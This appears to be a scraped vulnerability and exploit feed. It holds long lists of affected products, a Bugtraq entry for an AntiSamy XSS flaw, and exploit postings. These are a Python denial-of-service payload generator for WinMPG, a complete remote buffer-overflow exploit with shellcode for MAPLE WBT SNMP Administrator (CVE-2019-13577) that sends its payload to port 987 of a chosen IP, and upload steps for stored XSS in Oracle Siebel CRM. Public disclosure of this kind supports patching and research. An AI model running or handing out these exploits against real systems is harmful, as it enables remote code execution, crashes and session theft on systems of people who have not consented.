    Hitachi Tiered Storage Manager Software 6.1 -01 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.1 -01 (Linux)
    Hitachi Tiered Storage Manager Software 6.1 -00 (Windows)
    Hitachi Tiered Storage Manager Software 6.1 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.1 -00 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.1 -00 (Linux)
    Hitachi Tiered Storage Manager Software 8.0.0-05 (Windows)
    Hitachi Tiered Storage Manager Software 8.0.0-05 (Linux(SuSE
    Hitachi Tiered Storage Manager Software 8.0.0-05 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 8.0.0-00 (Windows)
    Hitachi Tiered Storage Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Tiered Storage Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 7.6.1-05 (Windows)
    Hitachi Tiered Storage Manager Software 7.6.1-05 (Solaris(x6
    Hitachi Tiered Storage Manager Software 7.6.1-05 (Solaris(SP
    Hitachi Tiered Storage Manager Software 7.6.1-05 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 7.5.0-02
    Hitachi Tiered Storage Manager Software 7.2.1-00
    Hitachi Tiered Storage Manager Software 7.1.1-00
    Hitachi Tiered Storage Manager Software 7.1.0-00 (Windows)
    Hitachi Tiered Storage Manager Software 7.1.0-00 (Solaris(SP
    Hitachi Tiered Storage Manager Software 7.1.0-00 (Linux(SLES
    Hitachi Tiered Storage Manager Software 7.1.0-00 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 7.0.1-02 (Windows)
    Hitachi Tiered Storage Manager Software 7.0.1-02 (linux(SLES
    Hitachi Tiered Storage Manager Software 7.0.1-02 (linux(RHEL
    Hitachi Tiered Storage Manager Software 7.0.0-00 (Windows)
    Hitachi Tiered Storage Manager Software 7.0.0-00 (Solaris(SP
    Hitachi Tiered Storage Manager Software 7.0.0-00 (linux(SLES
    Hitachi Tiered Storage Manager Software 7.0.0-00 (linux(RHEL
    Hitachi Tiered Storage Manager Software 6.4.0-08 (Windows)
    Hitachi Tiered Storage Manager Software 6.4.0-08 (Solaris(SP
    Hitachi Tiered Storage Manager Software 6.4.0-08 (Linux(SLES
    Hitachi Tiered Storage Manager Software 6.4.0-08 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 6.4.0-07 (Windows)
    Hitachi Tiered Storage Manager Software 6.4.0-07 (Solaris(SP
    Hitachi Tiered Storage Manager Software 6.4.0-07 (linux(SLES
    Hitachi Tiered Storage Manager Software 6.4.0-07 (linux(RHEL
    Hitachi Tiered Storage Manager Software 6.3.0-00 (linux(SLES
    Hitachi Tiered Storage Manager Software 6.2.0-00 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 6.0.0-00 (Windows)
    Hitachi Tiered Storage Manager Software 6.0.0-00 (Solaris(SP
    Hitachi Tiered Storage Manager Software 0
    Hitachi Replication Manager Software 8.0.0-05 (Linux(RHEL
    Hitachi Replication Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Replication Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Replication Manager Software 7.6.1-05 (Windows)
    Hitachi Replication Manager Software 7.6.1-05 (Solaris(x6
    Hitachi Replication Manager Software 7.6.1-05 (Solaris(SP
    Hitachi Replication Manager Software 7.6.1-05 (Linux(RHEL
    Hitachi JP1/Performance Management - Web Console 10-00-03 (Windows)
    Hitachi JP1/Performance Management - Web Console 10-00-03 (Solaris)
    Hitachi JP1/Performance Management - Web Console 10-00-03 (Linux)
    Hitachi JP1/Performance Management - Web Console 10-00-03 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 10-00-03 (AIX)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 10-00-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-50-03 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-50-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-10-10 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-10-03
    Hitachi JP1/Performance Management - Web Console 09-10-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-10-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-10-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-10-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-10-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-10
    Hitachi JP1/Performance Management - Web Console 09-00-12 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-00-12 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-00-12 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-00-12 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-00-12 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-00-08
    Hitachi JP1/Performance Management - Web Console 09-00-07
    Hitachi JP1/Performance Management - Web Console 09-00-02
    Hitachi JP1/Performance Management - Web Console 09-00-01
    Hitachi JP1/Performance Management - Web Console 09-00-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 09-00-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 09-00-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 09-00-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 09-00-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 09-00-00
    Hitachi JP1/Performance Management - Web Console 09-00
    Hitachi JP1/Performance Management - Web Console 08-50-13 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-50-13 (Solaris)
    Hitachi JP1/Performance Management - Web Console 08-50-13 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-50-13 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 08-50-13 (AIX)
    Hitachi JP1/Performance Management - Web Console 08-50-09
    Hitachi JP1/Performance Management - Web Console 08-50-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-50-00 (Solaris)
    Hitachi JP1/Performance Management - Web Console 08-50-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-50-00 (HP-UX)
    Hitachi JP1/Performance Management - Web Console 08-50-00 (AIX)
    Hitachi JP1/Performance Management - Web Console 08-50
    Hitachi JP1/Performance Management - Web Console 08-11-08 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-11-08 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-11-07
    Hitachi JP1/Performance Management - Web Console 08-11-01
    Hitachi JP1/Performance Management - Web Console 08-11-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-11-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-11-00
    Hitachi JP1/Performance Management - Web Console 08-11
    Hitachi JP1/Performance Management - Web Console 08-10-08 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-10-08 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-10-07
    Hitachi JP1/Performance Management - Web Console 08-10-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-10-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-10
    Hitachi JP1/Performance Management - Web Console 08-00-12 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-00-12 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-00-11
    Hitachi JP1/Performance Management - Web Console 08-00-03
    Hitachi JP1/Performance Management - Web Console 08-00-02
    Hitachi JP1/Performance Management - Web Console 08-00-00 (Windows)
    Hitachi JP1/Performance Management - Web Console 08-00-00 (Linux)
    Hitachi JP1/Performance Management - Web Console 08-00-00
    Hitachi JP1/Performance Management - Web Console 08-00
    Hitachi JP1/Performance Management - Web Console 0
    Hitachi JP1/Performance Management - Manager Web Option 07-54 (Windows)
    Hitachi JP1/Performance Management - Manager Web Option 07-54 (Solaris)
    Hitachi JP1/Performance Management - Manager Web Option 07-00 (Windows)
    Hitachi JP1/Performance Management - Manager Web Option 07-00 (Solaris)
    Hitachi Job Management Partner 1/Performance Management - Web Console 0
    Hitachi Global Link Manager Software 6.6 -00 (Windows)
    Hitachi Global Link Manager Software 6.5 -00 (Windows)
    Hitachi Global Link Manager Software 6.2 -01 (Windows)
    Hitachi Global Link Manager Software 6.2 -00 (Windows)
    Hitachi Global Link Manager Software 6.1 -01 (Windows)
    Hitachi Global Link Manager Software 6.1 -00 (Windows)
    Hitachi Global Link Manager Software 8.0.0-00 (Windows)
    Hitachi Global Link Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Global Link Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Global Link Manager Software 7.6.1-01 (Windows)
    Hitachi Global Link Manager Software 7.6.1-01 (Solaris(x6
    Hitachi Global Link Manager Software 7.6.1-01 (Solaris(SP
    Hitachi Global Link Manager Software 7.6.1-01 (Linux(RHEL
    Hitachi Device Manager Software 7.4 -00 (Windows)
    Hitachi Device Manager Software 7.4 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 7.4 -00 (Linux(SLES))
    Hitachi Device Manager Software 7.4 -00 (Linux(RHEL))
    Hitachi Device Manager Software 7.3 -00(Solaris(x64))
    Hitachi Device Manager Software 7.3 -00(Solaris(SPARC))
    Hitachi Device Manager Software 7.3 -00(Linux(SLES))
    Hitachi Device Manager Software 7.3 -00 (Windows)
    Hitachi Device Manager Software 7.3 -00 (Linux(RHEL))
    Hitachi Device Manager Software 7.0 -00 (Solaris(x64))
    Hitachi Device Manager Software 6.2 -02 (Windows)
    Hitachi Device Manager Software 6.2 -02 (Solaris(x64))
    Hitachi Device Manager Software 6.2 -02 (Solaris(SPARC))
    Hitachi Device Manager Software 6.2 -02 (Linux)
    Hitachi Device Manager Software 6.2 -01 (Windows)
    Hitachi Device Manager Software 6.2 -01 (Solaris(x64))
    Hitachi Device Manager Software 6.2 -01 (Solaris(SPARC))
    Hitachi Device Manager Software 6.2 -01 (Linux)
    Hitachi Device Manager Software 6.2 -00 (Windows)
    Hitachi Device Manager Software 6.2 -00 (Solaris(x64))
    Hitachi Device Manager Software 6.2 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 6.2 -00 (Solaris (x64))
    Hitachi Device Manager Software 6.2 -00 (Linux)
    Hitachi Device Manager Software 6.1.1 -04 (Windows)
    Hitachi Device Manager Software 6.1.1 -04 (Solaris(x64))
    Hitachi Device Manager Software 6.1.1 -04 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1.1 -04 (Solaris (x64))
    Hitachi Device Manager Software 6.1.1 -04 (Linux)
    Hitachi Device Manager Software 6.1.1 -03 (Windows)
    Hitachi Device Manager Software 6.1.1 -03 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1.1 -03 (Solaris (x64))
    Hitachi Device Manager Software 6.1.1 -03 (Linux)
    Hitachi Device Manager Software 6.1.1 -00 (Windows)
    Hitachi Device Manager Software 6.1.1 -00 (Solaris(x64))
    Hitachi Device Manager Software 6.1.1 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1.1 -00 (Solaris (x64))
    Hitachi Device Manager Software 6.1.1 -00 (Linux)
    Hitachi Device Manager Software 6.1 -03 (Windows)
    Hitachi Device Manager Software 6.1 -03 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1 -03 (Solaris (x64))
    Hitachi Device Manager Software 6.1 -03 (Linux)
    Hitachi Device Manager Software 6.1 -02 (Windows)
    Hitachi Device Manager Software 6.1 -02 (Solaris(x64))
    Hitachi Device Manager Software 6.1 -02 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1 -02 (Solaris (x64))
    Hitachi Device Manager Software 6.1 -02 (Linux)
    Hitachi Device Manager Software 6.1 -00 (Windows)
    Hitachi Device Manager Software 6.1 -00 (Solaris(x64))
    Hitachi Device Manager Software 6.1 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 6.1 -00 (Solaris (x64))
    Hitachi Device Manager Software 6.1 -00 (Linux)
    Hitachi Device Manager Software 6.0 -06 (Windows)
    Hitachi Device Manager Software 6.0 -06 (Solaris(SPARC))
    Hitachi Device Manager Software 6.0 -06 (Solaris (x64))
    Hitachi Device Manager Software 6.0 -06 (Linux)
    Hitachi Device Manager Software 6.0 -00 (Windows)
    Hitachi Device Manager Software 6.0 -00 (Solaris(SPARC))
    Hitachi Device Manager Software 6.0 -00 (Solaris (x64))
    Hitachi Device Manager Software 6.0 -00 (Linux)
    Hitachi Device Manager Software 8.0.0-05 (Windows)
    Hitachi Device Manager Software 8.0.0-05 (Linux(SuSE
    Hitachi Device Manager Software 8.0.0-05 (Linux(RHEL
    Hitachi Device Manager Software 8.0.0-00 (Windows)
    Hitachi Device Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Device Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Device Manager Software 7.6.1-05 (Windows)
    Hitachi Device Manager Software 7.6.1-05 (Solaris(x6
    Hitachi Device Manager Software 7.6.1-05 (Solaris(SP
    Hitachi Device Manager Software 7.6.1-05 (Linux(SuSE
    Hitachi Device Manager Software 7.6.1-05 (Linux(RHEL
    Hitachi Device Manager Software 7.5.0-02
    Hitachi Device Manager Software 7.4.0-00 (Solaris(Op
    Hitachi Device Manager Software 7.3.1 (windows)
    Hitachi Device Manager Software 7.2.1-01
    Hitachi Device Manager Software 7.2.1-00
    Hitachi Device Manager Software 7.1.0-00 (Windows)
    Hitachi Device Manager Software 7.1.0-00 (Solaris(SP
    Hitachi Device Manager Software 7.1.0-00 (Linux(SLES
    Hitachi Device Manager Software 7.1.0-00 (Linux(RHEL
    Hitachi Device Manager Software 7.0.1-02 (Windows)
    Hitachi Device Manager Software 7.0.1-02 (linux(SLES
    Hitachi Device Manager Software 7.0.1-02 (linux(RHEL
    Hitachi Device Manager Software 7.0.0-00 (Windows)
    Hitachi Device Manager Software 7.0.0-00 (Solaris(SP
    Hitachi Device Manager Software 7.0.0-00 (linux(SLES
    Hitachi Device Manager Software 7.0.0-00 (linux(RHEL
    Hitachi Device Manager Software 7.0.0-00
    Hitachi Device Manager Software 6.4.0-08 (Windows)
    Hitachi Device Manager Software 6.4.0-08 (Solaris(SP
    Hitachi Device Manager Software 6.4.0-08 (Linux(SLES
    Hitachi Device Manager Software 6.4.0-08 (Linux(RHEL
    Hitachi Device Manager Software 6.4.0-07 (Windows)
    Hitachi Device Manager Software 6.4.0-07 (Solaris(SP
    Hitachi Device Manager Software 6.4.0-07 (linux(SLES
    Hitachi Device Manager Software 6.4.0-07 (linux(RHEL
    Hitachi Device Manager Software 6.3.0-00 (linux(SLES
    F5 BIG-IP WebAccelerator 11.2.0 0
    F5 BIG-IP WebAccelerator 11.3
    F5 BIG-IP WebAccelerator 11.2.1 HF3
    F5 BIG-IP WebAccelerator 11.2.1
    F5 BIG-IP WebAccelerator 11.2 HF3
    F5 BIG-IP WebAccelerator 11.1
    F5 BIG-IP WebAccelerator 11.0
    F5 BIG-IP WebAccelerator 10.2.4
    F5 BIG-IP WebAccelerator 10.2.1
    F5 BIG-IP WebAccelerator 10.0
    F5 BIG-IP WebAccelerator 11.2.1 HF5
    F5 BIG-IP WebAccelerator 11.2.0 HF5
    F5 BIG-IP WebAccelerator 11.1.0 HF7
    F5 BIG-IP WebAccelerator 10.2.1 HF1
    F5 BIG-IP Edge Gateway 11.3
    F5 BIG-IP Edge Gateway 11.2.1 HF3
    F5 BIG-IP Edge Gateway 11.2.1
    F5 BIG-IP Edge Gateway 11.2 HF3
    F5 BIG-IP Edge Gateway 11.2
    F5 BIG-IP Edge Gateway 11.1
    F5 BIG-IP Edge Gateway 11.0
    F5 BIG-IP Edge Gateway 10.2.4
    F5 BIG-IP Edge Gateway 10.2.2
    F5 BIG-IP Edge Gateway 10.2.1
    F5 BIG-IP Edge Gateway 11.2.1 HF5
    F5 BIG-IP Edge Gateway 11.2.1 HF2
    F5 BIG-IP Edge Gateway 11.2.0 HF5
    F5 BIG-IP Edge Gateway 11.1.0 HF7
    F5 BIG-IP Edge Gateway 10.2.1 HF1
    F5 BIG-IP Edge Gateway 10.1
    F5 BIG-IP AAM 11.5.1
    F5 BIG-IP AAM 11.5
    F5 BIG-IP AAM 11.4.1
    F5 BIG-IP AAM 11.4.0
    F5 ARX 6.4
    F5 ARX 6.3
    F5 ARX 6.2
    F5 ARX 6.1.1
    F5 ARX 6.1
    F5 ARX 6.0
    Debian Linux 6.0 sparc
    Debian Linux 6.0 s/390
    Debian Linux 6.0 powerpc
    Debian Linux 6.0 mips
    Debian Linux 6.0 ia-64
    Debian Linux 6.0 ia-32
    Debian Linux 6.0 arm
    Debian Linux 6.0 amd64
    CentOS CentOS 5
    Apache Struts 1.3.10
    Apache Struts 1.3.8
    Apache Struts 1.3.5
    Apache Struts 1.2.9
    Apache Struts 1.2.8
    Apache Struts 1.2.7
    Apache Struts 1.2.4
    Apache Struts 1.1
    Apache Struts 1.0.2
    Apache Struts 1.2.6
    Apache Struts 1.2.2


    Not Vulnerable: VMWare vCenter Server 5.5 Update 2
    NTT DATA Corporation TERASOLUNA Server Framework for Java 2.0.5.2
    Juniper Security Threat Response Manager 2013.2R8
    Juniper Security Threat Response Manager 2012.1R7
    Juniper Secure Analytics 2014.2R2
    Juniper Secure Analytics 2013.2R8
    Juniper Secure Analytics 2012.1R7
    HP SiteScope 11.24.271
    HP SiteScope 11.13
    Hitachi Tuning Manager Software 8.0.0-06 (Windows)
    Hitachi Tuning Manager Software 8.0.0-06 (Linux(SuSE
    Hitachi Tuning Manager Software 8.0.0-06 (Linux(RHEL
    Hitachi Tiered Storage Manager Software 8.0.0-06 (Windows)
    Hitachi Tiered Storage Manager Software 8.0.0-06 (Linux(SuSE
    Hitachi Tiered Storage Manager Software 8.0.0-06 (Linux(RHEL
    Hitachi Replication Manager Software 8.0.0-06 (Linux(SuSE
    Hitachi Replication Manager Software 8.0.0-06 (Linux(RHEL
    Hitachi Global Link Manager Software 8.0.0-01 (Linux(SuSE
    Hitachi Global Link Manager Software 8.0.0-01 (Linux(RHEL
    Hitachi Device Manager Software 8.0.0-06 (Windows)
    Hitachi Device Manager Software 8.0.0-06 (Linux(SuSE
    Hitachi Device Manager Software 8.0.0-06 (Linux(RHEL
    Apache Struts 2.3.16.2


    Exploit


    Attackers can use readily available tools to exploit this issue.



      OWASP AntiSamy CVE-2017-14735 Cross Site Scripting Vulnerability



      OWASP AntiSamy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
      An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
      Versions of OWASP AntiSamy prior to 1.5.7 are vulnerable.

      Information

      Bugtraq ID: 105656
      Class: Input Validation Error
      CVE: CVE-2017-14735

      Remote: Yes
      Local: No
      Published: Sep 25 2017 12:00AM
      Updated: Jul 17 2019 07:00AM
      Credit: Raj Veerappan
      Vulnerable: Oracle WebCenter Sites 11.1.1 8.0
      Oracle Retail Returns Management 14.1
      Oracle Retail Returns Management 14.0
      Oracle Retail Returns Management 13.4
      Oracle Retail Returns Management 13.3
      Oracle Retail Central Office 14.1
      Oracle Retail Central Office 14.0
      Oracle Retail Central Office 13.4
      Oracle Retail Central Office 13.3
      Oracle Retail Back Office 14.1
      Oracle Retail Back Office 14.0
      Oracle Retail Back Office 13.4
      Oracle Retail Back Office 13.3
      Oracle Insurance Policy Administration J2EE 10.2
      Oracle Insurance Policy Administration J2EE 10.0
      Oracle Insurance Calculation Engine 9.7
      Oracle Insurance Calculation Engine 10.2
      Oracle Insurance Calculation Engine 10.1
      Oracle Insurance Calculation Engine 10.0
      Oracle Fusion Middleware MapViewer 12.2.1.3.0
      Oracle Fusion Middleware MapViewer 12.1.3.0
      Oracle FLEXCUBE Core Banking 11.8
      Oracle FLEXCUBE Core Banking 11.7
      Oracle FLEXCUBE Core Banking 11.6
      Oracle FLEXCUBE Core Banking 5.2
      Oracle Banking Platform 2.6.1
      Oracle Banking Platform 2.6
      Oracle Banking Platform 2.5.0
      Oracle Agile PLM 9.3.5
      Oracle Agile PLM 9.3.4
      Antisamy Project Antisamy 1.5.6
      Antisamy Project Antisamy 1.5.4
      Antisamy Project Antisamy 1.5.3
      Antisamy Project Antisamy 1.5.1
      Antisamy Project Antisamy 1.4.4


      Not Vulnerable: Antisamy Project Antisamy 1.5.7


      Exploit


      An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.


        WinMPG iPod Convert 3.0 Denial Of Service


        WinMPG iPod Convert version 3.0 Register flow denial of service proof of concept exploit.


        MD5 | bee17e5fa15fbe4821c7b222ab4fad83

        # Exploit Title: WinMPG iPod Convert 3.0 - 'Register' Denial of Service
        # Date: 2019-07-16
        # Vendor Homepage: http://www.winmpg.com
        # Software Link: https://www.techspot.com/downloads/downloadnow/6192/?evp=d62142990e9320a4e811b283fdcc4060&file=
        # Exploit Author: stresser
        # Tested Version: 3.0
        # Tested on: Windows XP SP3 EN


        # 1.- Run python code: WinMPG.py
        # 2.- Open EVIL.txt and copy content to clipboard
        # 3.- Open WinMPG and Click 'Register'
        # 4.- Paste the content of EVIL.txt into the Field: 'User Name and User Code'
        # 5.- Click 'Ok' and you will see a crash.

        #!/usr/bin/env python
        # 6000 "A" characters to paste into the registration fields
        buffer = "\x41" * 6000

        try:
            f = open("Evil.txt", "w")
            print("[+] Creating %s bytes evil payload.." % len(buffer))
            f.write(buffer)
            f.close()
            print("[+] File created!")
        except IOError:
            print("File cannot be created")

        MAPLE Computer WBT SNMP Administrator 2.0.195.15 Buffer Overflow


        MAPLE Computer WBT SNMP Administrator version 2.0.195.15 suffers from a buffer overflow vulnerability that allows for code execution.


        MD5 | a6d1442ffd46e1f782c5c9c9d20d026e

        [+] Credits: John Page (aka hyp3rlinx)    
        [+] Website: hyp3rlinx.altervista.org
        [+] Source: http://hyp3rlinx.altervista.org/advisories/MAPLE-WBT-SNMP-ADMINISTRATOR-v2.0.195.15-REMOTE-BUFFER-OVERFLOW-CODE-EXECUTION-0DAY.txt
        [+] ISR: Apparition Security


        [Vendor]
        www.computerlab.com


        [Product]
        MAPLE Computer WBT SNMP Administrator (Thin Client Administrator)
        v2.0.195.15

        https://www.computerlab.com/index.php/downloads/category/27-device-manager
        ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
        SnmpSetup.195.15.EXE - MD5 Hash: a3913aae166c11ddd21dca437e78c3f4

        The CLI Thin Client Manager is designed to provide remote management and control of CLI Thin Clients.
        This software is built on the TCP/IP industry standard SNMP (Simple Network Communication Protocol).
        Agents are built into the clients for remote management and configuration.


        [Vulnerability Type]
        Unauthenticated Remote Buffer Overflow Code Execution 0day


        [CVE Reference]
        CVE-2019-13577


        [Security Issue]
        SnmpAdm.exe in MAPLE WBT SNMP Administrator v2.0.195.15 has an Unauthenticated Remote Buffer Overflow via a long string to the CE Remote feature listening on Port 987.
        This will overwrite data on the stack/registers and allow for control of the program's execution flow, resulting in attacker-supplied remote code execution.
        Authentication is not required for this exploit.

        This program seems to be packed using ASPack v2.12 and can be difficult to unpack because it uses self-modifying code.
        When installing the vulnerable program, if it asks for a serial number just enter a value of "1" or something.
        Upon launching the program if any errors occur try right click SnmpAdm.exe and run it as Admin.
        Interestingly, it seems to drop DLLs with .tmp extensions in AppData\Local\Temp directory, make OS system files viewable in explorer to see them.

        e.g. C:\Users\blah\AppData\Local\Temp\~ip6B92.tmp

        ASLR / SEH all set to False helping to make exploit more portable.

        CALL EBX
        10008FB3 0x10008fb3 : call ebx | null {PAGE_EXECUTE_READ} [ipwSNMPv5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.0.1364 (C:\Program Files (x86)\SnmpAdm\ipwSNMPv5.dll)

        Stack dump:

        EAX 41414141
        ECX 0018FEFC
        EDX 0018FF10
        EBX 022DDA78 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        ESP 0018FECC
        EBP 0018FEF4
        ESI 0018FF10
        EDI 0018FEFC
        EIP 41414141
        C 0 ES 002B 32bit 0(FFFFFFFF)
        P 1 CS 0023 32bit 0(FFFFFFFF)
        A 0 SS 002B 32bit 0(FFFFFFFF)
        Z 0 DS 002B 32bit 0(FFFFFFFF)
        S 0 FS 0053 32bit 7EFDD000(FFF)
        T 0 GS 002B 32bit 0(FFFFFFFF)
        D 0
        O 0 LastErr ERROR_NO_SCROLLBARS (000005A7)
        EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)



        [Exploit/POC]
        from socket import *
        import struct,sys,argparse

        #MAPLE WBT SNMP Administrator (SnmpAdm.exe) v2.0.195.15
        #CVE-2019-13577
        #Remote Buffer Overflow 0day
        #hyp3rlinx - ApparitionSec

        #Pop calc.exe Windows 7 SP1
        sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
        "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
        "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
        "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
        "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
        "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
        "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

        eip = struct.pack("<L", 0x10008fb3) #JMP EBX
        popebx = struct.pack("<L", 0x022C0012) #5B POP EBX

        buf0="B"*693704
        buf1=eip
        buf2=popebx+sc+"R"*899+"W"*23975
        payload=buf0+buf1+buf2

        def doit(IP,payload):
        try:
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((IP, 987))
        s.send(payload)
        print "CVE-2019-13577 - WBT SNMP Administrator Buffer Overflow 0day."
        print "hyp3rlinx"
        s.close()
        except Exception as e:
        print str(e)

        def parse_args():
        parser = argparse.ArgumentParser()
        parser.add_argument("-i", "--ipaddress", help="IP of Target CVE-2019-13577")
        return parser.parse_args()

        def main(args):
        doit(args.ipaddress,payload)


        if __name__ == "__main__":
        if not len(sys.argv) > 1:
        print "[*] No args supplied see Help -h"
        exit()
        main(parse_args())





        [POC Video URL]
        https://www.youtube.com/watch?v=THMqueCIrFw


        [Network Access]
        Remote


        [Severity]
        High


        [Disclosure Timeline]
        Vendor Notification: July 10, 2019
        Second vendor notification attempt: July 13, 2019
        No vendor replies.
        July 17, 2019 : Public Disclosure



        [+] Disclaimer
        The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
        Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
        that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
        is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
        for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
        or exploits by the author or elsewhere. All content (c).

        hyp3rlinx


        Oracle Siebel CRM 19.0 Cross Site Scripting


        Oracle Siebel CRM version 19.0 suffers from a persistent cross site scripting vulnerability.


        MD5 | 4a88161473af34c0bd9555142c5d7a79

        # Exploit Title: Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting
        # Date: 2019-07-17
        # Exploit Author: Sarath Nair aka AceNeon13
        # Contact: @AceNeon13
        # Vendor Homepage: www.oracle.com
        # Software Link: https://www.oracle.com/applications/siebel/
        # Version: Siebel CRM (UI Framework) Version 19.0 and prior
        # CVE: N/A
        # Greetings: Deepu.tv

        # PoC Exploit: Persistent Cross Site Scripting by Insecure File Upload
        -----------------------------------------------------------------------
        Vulnerable URL: http://<Siebel_Application>/finsadm_enu/start.swe?SWECmd=GotoView&SWEView=Activity+Attachment+View

        #Steps to exploit the issue:
        #1. Login to the CRM application and navigate to ‘Activities’ and click on ‘All Activities’.
        #2. Edit one of the existing activities, or create a new one.
        #3. Use the ‘New File’ menu in the ‘attachments’ section to upload an HTML file with a JavaScript payload (via a proxy tool).
        #4. The JavaScript payload will be triggered/rendered when the victim user views the attached file.

        # Description: The Siebel CRM application allows its users to upload any file type in most of the available file upload functionalities; later on, the uploaded file can be downloaded by another user with the appropriate privileges as part of the workflow. As such, it was possible to upload a file with the “html” extension (containing HTML and JavaScript code), thereby also allowing a Persistent Cross Site Scripting attack.
        # Impact: Cross-Site Scripting attacks do not target the server but rather its users. A hypothetical attacker could use the web server in order to trick other users into unwillingly executing malicious code saved on the server with an XSS payload. The impact of such an attack can range from the disclosure of the user’s sensitive information to execution of arbitrary code on the target user’s system.
